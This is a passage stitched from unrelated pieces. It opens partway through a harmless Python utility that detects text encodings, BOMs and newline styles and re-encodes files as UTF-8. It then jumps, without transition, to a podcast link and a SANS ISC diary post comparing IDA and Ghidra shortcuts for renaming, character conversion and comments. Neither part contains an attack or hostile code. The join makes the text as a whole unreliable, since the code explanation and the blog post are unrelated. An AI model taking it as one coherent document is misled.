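    suffix = enc.split("-")[-1] if enc else ""
    if suffix == "le":
        info["endianness"] = "little"
    elif suffix == "be":
        info["endianness"] = "big"
    try:
        text = data[info["bom_len"]:].decode(enc) if enc else ""
    except UnicodeDecodeError:
        text = ""
    if "\r\n" in text:
        info["newline"] = "CRLF"
    elif "\n" in text:
        info["newline"] = "LF"
    elif "\r" in text:
        info["newline"] = "CR"
    return info


def to_utf8(data: bytes) -> bytes:
    """Re-encode a sniffed file as UTF-8 without BOM, normalising CRLF to LF."""
    info = sniff(data)
    text = data[info["bom_len"]:].decode(info["encoding"] or "utf-8")
    return text.replace("\r\n", "\n").encode("utf-8")


# Constructed samples
UTF16LE_BOM_XML = codecs.BOM_UTF16_LE + '<event id="1"/>\r\n'.encode("utf-16-le")
UTF16LE_NOBOM = "hello\r\n".encode("utf-16-le")
PLAIN_ASCII = b"hello\n"

if __name__ == "__main__":
    for blob in (UTF16LE_BOM_XML, UTF16LE_NOBOM, PLAIN_ASCII):
        print(sniff(blob), to_utf8(blob))
```

The null-byte heuristic is what catches the case from the diary where the editor had silently saved a file as UTF-16: with a BOM the answer is certain, without one the alternating zero bytes are the tell.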
ISC Stormcast For Monday, May 6th 2019 https://isc.sans.edu/podcastdetail.html?id=6484, (Sun, May 5th)
In this entry in my series, I'll look at a few more of the features I regularly use in IDA and how to accomplish the same in Ghidra.
The first one is simple conversion, in this case hex to ASCII characters (classic stack strings stuff that we cover in Day 5 of FOR610). I miss IDA's 'R' key mapping, but that is currently taken by View/Edit References From. You can change that or create your own key mapping; Ctrl-Alt-R isn't currently taken, so that's what I use. Just like in IDA, you can right-click on the value, but then you have to choose Convert and then Char from the submenu.
Another of the features I use regularly is renaming arguments, variables, and functions as I begin to figure out their purposes. In IDA, this is the 'N' key; in Ghidra, it is the 'L' key for Label. It works exactly like in IDA. In the screenshot below, you'll see it in the right-click menu.
And below is the actual dialog to do the renaming.
And the last functionality I want to cover in this post is comments. There are 4 (well, 5) types of comments you can create in Ghidra: pre-comments, which appear above the instruction where you place them; post-comments, which appear below; EOL (and repeatable) comments at the end of the line; and plate comments, which replace the generic "Function" comment at the top of the function. I actually like some of the additions, especially the plate comment, which can be used to fill in what I've discovered about the functionality of the function in question.
And here are examples of each:
I've got at least one more post in this series, probably next week. As with the others, if you have any tips, comments, corrections, etc., let me know via our contact page, e-mail, or via the comments below. Until next time...
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu